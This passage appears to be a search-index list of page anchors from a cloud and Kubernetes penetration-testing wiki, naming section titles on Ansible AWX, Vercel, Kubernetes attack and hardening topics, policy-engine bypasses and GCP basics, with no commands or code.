","pentesting-ci-cd/ansible-tower-awx-automation-controller-security.html#rbac","pentesting-ci-cd/ansible-tower-awx-automation-controller-security.html#supported-roles","pentesting-ci-cd/ansible-tower-awx-automation-controller-security.html#enumeration--attack-path-mapping-with-ansiblehound","pentesting-ci-cd/ansible-tower-awx-automation-controller-security.html#why-is-this-useful","pentesting-ci-cd/ansible-tower-awx-automation-controller-security.html#prerequisites","pentesting-ci-cd/ansible-tower-awx-automation-controller-security.html#building--running","pentesting-ci-cd/ansible-tower-awx-automation-controller-security.html#bloodhound-transformation","pentesting-ci-cd/ansible-tower-awx-automation-controller-security.html#defensive--offensive-considerations","pentesting-ci-cd/ansible-tower-awx-automation-controller-security.html#references","pentesting-ci-cd/vercel-security.html#vercel","pentesting-ci-cd/vercel-security.html#basic-information","pentesting-ci-cd/vercel-security.html#project-settings","pentesting-ci-cd/vercel-security.html#general","pentesting-ci-cd/vercel-security.html#domains","pentesting-ci-cd/vercel-security.html#environments","pentesting-ci-cd/vercel-security.html#environment-variables","pentesting-ci-cd/vercel-security.html#git","pentesting-ci-cd/vercel-security.html#integrations","pentesting-ci-cd/vercel-security.html#deployment-protection","pentesting-ci-cd/vercel-security.html#functions","pentesting-ci-cd/vercel-security.html#data-cache","pentesting-ci-cd/vercel-security.html#cron-jobs","pentesting-ci-cd/vercel-security.html#log-drains","pentesting-ci-cd/vercel-security.html#security","pentesting-ci-cd/vercel-security.html#advanced","pentesting-ci-cd/vercel-security.html#project-firewall","pentesting-ci-cd/vercel-security.html#firewall","pentesting-ci-cd/vercel-security.html#custom-rules--ip-blocking","pentesting-ci-cd/vercel-security.html#project-deployment","pentesting-ci-cd/vercel-security.html#source","pentesting-ci-cd/vercel-security.html#skew-protection","pentesting-ci-cd/vercel-security.html#team-settings","pentesting-ci-cd/vercel-security.html#general-1","pentesting-ci-cd/vercel-security.html#billing","pentesting-ci-cd/vercel-security.html#members","pentesting-ci-cd/vercel-security.html#access-groups","pentesting-ci-cd/vercel-security.html#log-drains-1","pentesting-ci-cd/vercel-security.html#security--privacy","pentesting-ci-cd/vercel-security.html#secure-compute","pentesting-ci-cd/vercel-security.html#environment-variables-1","pentesting-ci-cd/todo.html#todo","pentesting-cloud/pentesting-cloud-methodology.html#pentesting-cloud-methodology","pentesting-cloud/pentesting-cloud-methodology.html#basic-methodology","pentesting-cloud/pentesting-cloud-methodology.html#multi-cloud-tools","pentesting-cloud/pentesting-cloud-methodology.html#purplepanda","pentesting-cloud/pentesting-cloud-methodology.html#prowler","pentesting-cloud/pentesting-cloud-methodology.html#cloudsploit","pentesting-cloud/pentesting-cloud-methodology.html#scoutsuite","pentesting-cloud/pentesting-cloud-methodology.html#steampipe","pentesting-cloud/pentesting-cloud-methodology.html#cs-suite","pentesting-cloud/pentesting-cloud-methodology.html#nessus","pentesting-cloud/pentesting-cloud-methodology.html#cloudlist","pentesting-cloud/pentesting-cloud-methodology.html#cartography","pentesting-cloud/pentesting-cloud-methodology.html#starbase","pentesting-cloud/pentesting-cloud-methodology.html#skyark","pentesting-cloud/pentesting-cloud-methodology.html#cloud-brute","pentesting-cloud/pentesting-cloud-methodology.html#cloudfox","pentesting-cloud/pentesting-cloud-methodology.html#more-lists-of-cloud-security-tools","pentesting-cloud/pentesting-cloud-methodology.html#google","pentesting-cloud/pentesting-cloud-methodology.html#gcp","pentesting-cloud/pentesting-cloud-methodology.html#workspace","pentesting-cloud/pentesting-cloud-methodology.html#aws","pentesting-cloud/pentesting-cloud-methodology.html#azure","pentesting-cloud/pentesting-cloud-methodology.html#attack-graph","pentesting-cloud/pentesting-cloud-methodology.html#office365","pentesting-cloud/kubernetes-security/index.html#kubernetes-pentesting","pentesting-cloud/kubernetes-security/index.html#kubernetes-basics","pentesting-cloud/kubernetes-security/index.html#labs-to-practice-and-learn","pentesting-cloud/kubernetes-security/index.html#hardening-kubernetes--automatic-tools","pentesting-cloud/kubernetes-security/index.html#manual-kubernetes-pentest","pentesting-cloud/kubernetes-security/index.html#from-the-outside","pentesting-cloud/kubernetes-security/index.html#enumeration-inside-a-pod","pentesting-cloud/kubernetes-security/index.html#enumerating-kubernetes-with-credentials","pentesting-cloud/kubernetes-security/index.html#privesc-to-a-different-namespace","pentesting-cloud/kubernetes-security/index.html#from-kubernetes-to-the-cloud","pentesting-cloud/kubernetes-security/kubernetes-basics.html#kubernetes-basics","pentesting-cloud/kubernetes-security/kubernetes-basics.html#architecture--basics","pentesting-cloud/kubernetes-security/kubernetes-basics.html#what-does-kubernetes-do","pentesting-cloud/kubernetes-security/kubernetes-basics.html#architecture","pentesting-cloud/kubernetes-security/kubernetes-basics.html#pki-infrastructure---certificate-authority-ca","pentesting-cloud/kubernetes-security/kubernetes-basics.html#basic-actions","pentesting-cloud/kubernetes-security/kubernetes-basics.html#minikube","pentesting-cloud/kubernetes-security/kubernetes-basics.html#kubectl-basics","pentesting-cloud/kubernetes-security/kubernetes-basics.html#minikube-dashboard","pentesting-cloud/kubernetes-security/kubernetes-basics.html#yaml-configuration-files-examples","pentesting-cloud/kubernetes-security/kubernetes-basics.html#namespaces","pentesting-cloud/kubernetes-security/kubernetes-basics.html#helm","pentesting-cloud/kubernetes-security/kubernetes-basics.html#kubernetes-secrets","pentesting-cloud/kubernetes-security/kubernetes-basics.html#secrets-in-etcd","pentesting-cloud/kubernetes-security/kubernetes-basics.html#references","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/index.html#pentesting-kubernetes-services","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/index.html#finding-exposed-pods-with-osint","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/index.html#how-kubernetes-exposes-services","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/index.html#finding-exposed-pods-via-port-scanning","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/index.html#nmap","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/index.html#kube-apiserver","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/index.html#kubelet-api","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/index.html#etcd-api","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/index.html#tiller","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/index.html#cadvisor","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/index.html#nodeport","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/index.html#vulnerable-misconfigurations","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/index.html#kube-apiserver-anonymous-access","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/index.html#checking-for-etcd-anonymous-access","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/index.html#kubelet-rce","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/index.html#checking-kubelet-read-only-port-information-exposure","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/index.html#references","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/kubelet-authentication-and-authorization.html#kubelet-authentication--authorization","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/kubelet-authentication-and-authorization.html#kubelet-authentication","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/kubelet-authentication-and-authorization.html#kubelet-authorization","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/kubelet-authentication-and-authorization.html#references","pentesting-cloud/kubernetes-security/exposing-services-in-kubernetes.html#exposing-services-in-kubernetes","pentesting-cloud/kubernetes-security/exposing-services-in-kubernetes.html#automatic-enumeration","pentesting-cloud/kubernetes-security/exposing-services-in-kubernetes.html#clusterip","pentesting-cloud/kubernetes-security/exposing-services-in-kubernetes.html#nodeport","pentesting-cloud/kubernetes-security/exposing-services-in-kubernetes.html#loadbalancer","pentesting-cloud/kubernetes-security/exposing-services-in-kubernetes.html#external-ips","pentesting-cloud/kubernetes-security/exposing-services-in-kubernetes.html#externalname","pentesting-cloud/kubernetes-security/exposing-services-in-kubernetes.html#ingress","pentesting-cloud/kubernetes-security/exposing-services-in-kubernetes.html#references","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#attacking-kubernetes-from-inside-a-pod","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#pod-breakout","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#escaping-from-the-pod","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#abusing-kubernetes-privileges","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#abusing-cloud-privileges","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#search-vulnerable-network-services","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#services","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#scanning","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#sniffing","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#network-spoofing","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#node-dos","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#node-post-exploitation","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#find-node-kubeconfig","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#steal-secrets","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#privileged-daemonsets","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#pivot-to-cloud","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#steal-etcd","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#staticmirrored-pods-persistence","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#delete-pods--unschedulable-nodes","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#automatic-tools","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#kubernetes-enumeration","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#kubernetes-tokens","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#service-account-tokens","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#hot-pods","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#rbac","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#gui-applications","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#enumeration-cheatsheet","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#differences-between-list-and-get-verbs","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#using-curl","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#using-kubectl","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#current-configuration","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#get-supported-resources","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#get-current-privileges","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#get-others-roles","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#get-namespaces","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#get-secrets","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#get-service-accounts","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#get-deployments","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#get-pods","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#get-services","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#get-nodes","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#get-daemonsets","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#get-cronjob","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#get-configmap","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#get-network-policies--cilium-network-policies","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#get-everything--all","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#get-all-resources-managed-by-helm","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#get-pods-consumptions","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#interacting-with-the-cluster-without-using-kubectl","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#escaping-from-the-pod","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#creating-a-privileged-pod","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#delete-a-pod","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#create-a-service-account","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#delete-a-service-account","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#create-a-role","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#delete-a-role","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#create-a-role-binding","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#delete-a-role-binding","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#delete-a-secret","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#delete-a-secret-1","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#references","pentesting-cloud/kubernetes-security/kubernetes-role-based-access-control-rbac.html#kubernetes-role-based-access-controlrbac","pentesting-cloud/kubernetes-security/kubernetes-role-based-access-control-rbac.html#role-based-access-control-rbac","pentesting-cloud/kubernetes-security/kubernetes-role-based-access-control-rbac.html#templates","pentesting-cloud/kubernetes-security/kubernetes-role-based-access-control-rbac.html#rules-verbs","pentesting-cloud/kubernetes-security/kubernetes-role-based-access-control-rbac.html#examples","pentesting-cloud/kubernetes-security/kubernetes-role-based-access-control-rbac.html#rolebinding-and-clusterrolebinding","pentesting-cloud/kubernetes-security/kubernetes-role-based-access-control-rbac.html#enumerating-rbac","pentesting-cloud/kubernetes-security/kubernetes-role-based-access-control-rbac.html#abuse-roleclusterroles-for-privilege-escalation","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#abusing-rolesclusterroles-in-kubernetes","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#privilege-escalation","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#access-any-resource-or-verb-wildcard","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#access-any-resource-with-a-specific-verb","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#pod-create---steal-token","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#pod-create--escape","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#pod-create---move-to-cloud","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#createpatch-deployment-daemonsets-statefulsets-replicationcontrollers-replicasets-jobs-and-cronjobs","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#pods-exec","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#port-forward","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#hosts-writable-varlog-escape","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#impersonating-privileged-accounts","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#listing-secrets","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#creating-and-reading-secrets","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#reading-a-secret--brute-forcing-token-ids","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#encrpytionconfiguration-in-clear-text","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#certificate-signing-requests","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#aws-eks-aws-auth-configmaps","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#coredns-config-map","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#escalating-in-gke","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#create-serviceaccounts-token","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#ephemeralcontainers","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#validatingwebhookconfigurations-or-mutatingwebhookconfigurations","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#escalate","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#nodes-proxy","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#delete-pods--unschedulable-nodes","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#services-status-cve-2020-8554","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#nodes-and-pods-status","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#built-in-privileged-escalation-prevention","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#get--patch-rolebindingsclusterrolebindings","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#other-attacks","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#sidecar-proxy-app","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#malicious-admission-controller","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#opa-gatekeeper-bypass","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#best-practices","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#disabling-automount-of-service-account-tokens","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#restrictive-user-assignment-in-rolebindingsclusterrolebindings","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#namespace-specific-roles-over-cluster-wide-roles","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#use-automated-tools","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#references","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.html#pod-escape-privileges","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.html#privileged-and-hostpid","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/kubernetes-roles-abuse-lab.html#kubernetes-roles-abuse-lab","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/kubernetes-roles-abuse-lab.html#pod-creation---escalate-to-ns-sas","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/kubernetes-roles-abuse-lab.html#create-daemonset","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/kubernetes-roles-abuse-lab.html#patch-daemonset","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/kubernetes-roles-abuse-lab.html#doesnt-work","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/kubernetes-roles-abuse-lab.html#createpatch-bindings","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/kubernetes-roles-abuse-lab.html#bind-explicitly-bindings","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/kubernetes-roles-abuse-lab.html#arbitrary-roles-creation","pentesting-cloud/kubernetes-security/kubernetes-namespace-escalation.html#kubernetes-namespace-escalation","pentesting-cloud/kubernetes-security/kubernetes-namespace-escalation.html#abuse-k8s-privileges","pentesting-cloud/kubernetes-security/kubernetes-namespace-escalation.html#escape-to-the-node","pentesting-cloud/kubernetes-security/kubernetes-external-secrets-operator.html#external-secret-operator","pentesting-cloud/kubernetes-security/kubernetes-external-secrets-operator.html#disclaimer","pentesting-cloud/kubernetes-security/kubernetes-external-secrets-operator.html#prerequisites","pentesting-cloud/kubernetes-security/kubernetes-external-secrets-operator.html#gathering-information-about-existing-clustersecretstore","pentesting-cloud/kubernetes-security/kubernetes-external-secrets-operator.html#externalsecret-enumeration","pentesting-cloud/kubernetes-security/kubernetes-external-secrets-operator.html#assembling-the-pieces","pentesting-cloud/kubernetes-security/kubernetes-external-secrets-operator.html#references","pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.html#kubernetes-pivoting-to-clouds","pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.html#gcp","pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.html#mounting-gcp-sa-keys-as-secret","pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.html#relating-gsa-json-to-ksa-secret","pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.html#gke-workload-identity","pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.html#aws","pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.html#kiam--kube2iam-iam-role-for-pods","pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.html#iam-role-for-k8s-service-accounts-via-oidc","pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.html#find-pods-a-sas-with-iam-roles-in-the-cluster","pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.html#node-iam-role-to-cluster-admin","pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.html#steal-iam-role-token","pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.html#privesc-to-cluster-admin","pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.html#references","pentesting-cloud/kubernetes-security/kubernetes-network-attacks.html#kubernetes-network-attacks","pentesting-cloud/kubernetes-security/kubernetes-network-attacks.html#introduction","pentesting-cloud/kubernetes-security/kubernetes-network-attacks.html#basic-kubernetes-networking","pentesting-cloud/kubernetes-security/kubernetes-network-attacks.html#arp","pentesting-cloud/kubernetes-security/kubernetes-network-attacks.html#dns","pentesting-cloud/kubernetes-security/kubernetes-network-attacks.html#arp-spoofing-in-pods-in-the-same-node","pentesting-cloud/kubernetes-security/kubernetes-network-attacks.html#scapy","pentesting-cloud/kubernetes-security/kubernetes-network-attacks.html#arpspoof","pentesting-cloud/kubernetes-security/kubernetes-network-attacks.html#dns-spoofing","pentesting-cloud/kubernetes-security/kubernetes-network-attacks.html#dns-spoofing-via-coredns-configmap","pentesting-cloud/kubernetes-security/kubernetes-network-attacks.html#abusing-exposed-kubernetes-management-services","pentesting-cloud/kubernetes-security/kubernetes-network-attacks.html#enumerating-kubernetes-network-policies","pentesting-cloud/kubernetes-security/kubernetes-network-attacks.html#capturing-traffic","pentesting-cloud/kubernetes-security/kubernetes-network-attacks.html#references","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#kubernetes-hardening","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#tools-to-analyse-a-cluster","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#steampipe---kubernetes-compliance","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#kubescape","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#popeye","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#kube-bench","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#kubeaudit","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#kube-hunter","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#trivy","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#kubei","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#kubiscan","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#managed-kubernetes-auditing-toolkit","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#audit-iac-code","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#kics","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#checkov","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#kube-score","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#tips","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#kubernetes-podsecuritycontext-and-securitycontext","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#kubernetes-api-hardening","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#securitycontext-hardening","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#general-hardening","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#kubernetes-monitoring--security","pentesting-cloud/kubernetes-security/kubernetes-hardening/kubernetes-securitycontext-s.html#kubernetes-securitycontexts","pentesting-cloud/kubernetes-security/kubernetes-hardening/kubernetes-securitycontext-s.html#podsecuritycontext","pentesting-cloud/kubernetes-security/kubernetes-hardening/kubernetes-securitycontext-s.html#securitycontext","pentesting-cloud/kubernetes-security/kubernetes-hardening/kubernetes-securitycontext-s.html#references","pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/index.html#kubernetes---opa-gatekeeper","pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/index.html#definition","pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/index.html#apply-constraint","pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/index.html#references","pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.html#kubernetes-opa-gatekeeper-bypass","pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.html#abusing-misconfiguration","pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.html#enumerate-rules","pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.html#excluded-namespaces","pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.html#bypass","pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.html#abusing-validatingwebhookconfiguration","pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.html#references","pentesting-cloud/kubernetes-security/kubernetes-kyverno/index.html#kubernetes-kyverno","pentesting-cloud/kubernetes-security/kubernetes-kyverno/index.html#definition","pentesting-cloud/kubernetes-security/kubernetes-kyverno/index.html#use-cases","pentesting-cloud/kubernetes-security/kubernetes-kyverno/index.html#example-clusterpolicy-and-policy","pentesting-cloud/kubernetes-security/kubernetes-kyverno/index.html#references","pentesting-cloud/kubernetes-security/kubernetes-kyverno/kubernetes-kyverno-bypass.html#kubernetes-kyverno-bypass","pentesting-cloud/kubernetes-security/kubernetes-kyverno/kubernetes-kyverno-bypass.html#abusing-policies-misconfiguration","pentesting-cloud/kubernetes-security/kubernetes-kyverno/kubernetes-kyverno-bypass.html#enumerate-rules","pentesting-cloud/kubernetes-security/kubernetes-kyverno/kubernetes-kyverno-bypass.html#enumerate-excluded","pentesting-cloud/kubernetes-security/kubernetes-kyverno/kubernetes-kyverno-bypass.html#example","pentesting-cloud/kubernetes-security/kubernetes-kyverno/kubernetes-kyverno-bypass.html#abusing-validatingwebhookconfiguration","pentesting-cloud/kubernetes-security/kubernetes-kyverno/kubernetes-kyverno-bypass.html#more-info","pentesting-cloud/kubernetes-security/kubernetes-validatingwebhookconfiguration.html#kubernetes-validatingwebhookconfiguration","pentesting-cloud/kubernetes-security/kubernetes-validatingwebhookconfiguration.html#definition","pentesting-cloud/kubernetes-security/kubernetes-validatingwebhookconfiguration.html#purpose","pentesting-cloud/kubernetes-security/kubernetes-validatingwebhookconfiguration.html#enumeration","pentesting-cloud/kubernetes-security/kubernetes-validatingwebhookconfiguration.html#abusing-kyverno-and-gatekeeper-vwc","pentesting-cloud/kubernetes-security/kubernetes-validatingwebhookconfiguration.html#use-case","pentesting-cloud/kubernetes-security/kubernetes-validatingwebhookconfiguration.html#references","pentesting-cloud/gcp-security/index.html#gcp-pentesting","pentesting-cloud/gcp-security/index.html#basic-information","pentesting-cloud/gcp-security/index.html#labs-to-learn","pentesting-cloud/gcp-security/index.html#gcp-pentesterred-team-methodology","pentesting-cloud/gcp-security/index.html#basic-enumeration","pentesting-cloud/gcp-security/index.html#ssrf","pentesting-cloud/gcp-security/index.html#whoami","pentesting-cloud/gcp-security/index.html#org-enumeration","pentesting-cloud/gcp-security/index.html#principals--iam-enumeration","pentesting-cloud/gcp-security/index.html#services-enumeration","pentesting-cloud/gcp-security/index.html#privilege-escalation-post-exploitation--persistence","pentesting-cloud/gcp-security/index.html#publicly-exposed-services","pentesting-cloud/gcp-security/index.html#gcp--workspace-pivoting","pentesting-cloud/gcp-security/index.html#automatic-tools","pentesting-cloud/gcp-security/index.html#gcloud-config--debug","pentesting-cloud/gcp-security/index.html#capture-gcloud-gsutil-network","pentesting-cloud/gcp-security/index.html#oauth-token-configure-in-gcloud","pentesting-cloud/gcp-security/index.html#references","pentesting-cloud/gcp-security/gcp-basic-information/index.html#gcp---basic-information","pentesting-cloud/gcp-security/gcp-basic-information/index.html#resource-hierarchy","pentesting-cloud/gcp-security/gcp-basic-information/index.html#projects-migration","pentesting-cloud/gcp-security/gcp-basic-information/index.html#organization-policies","pentesting-cloud/gcp-security/gcp-basic-information/index.html#default-organization-policies","pentesting-cloud/gcp-security/gcp-basic-information/index.html#iam-roles","pentesting-cloud/gcp-security/gcp-basic-information/index.html#users","pentesting-cloud/gcp-security/gcp-basic-information/index.html#groups","pentesting-cloud/gcp-security/gcp-basic-information/index.html#default-password-policy","pentesting-cloud/gcp-security/gcp-basic-information/index.html#service-accounts","pentesting-cloud/gcp-security/gcp-basic-information/index.html#keys--tokens"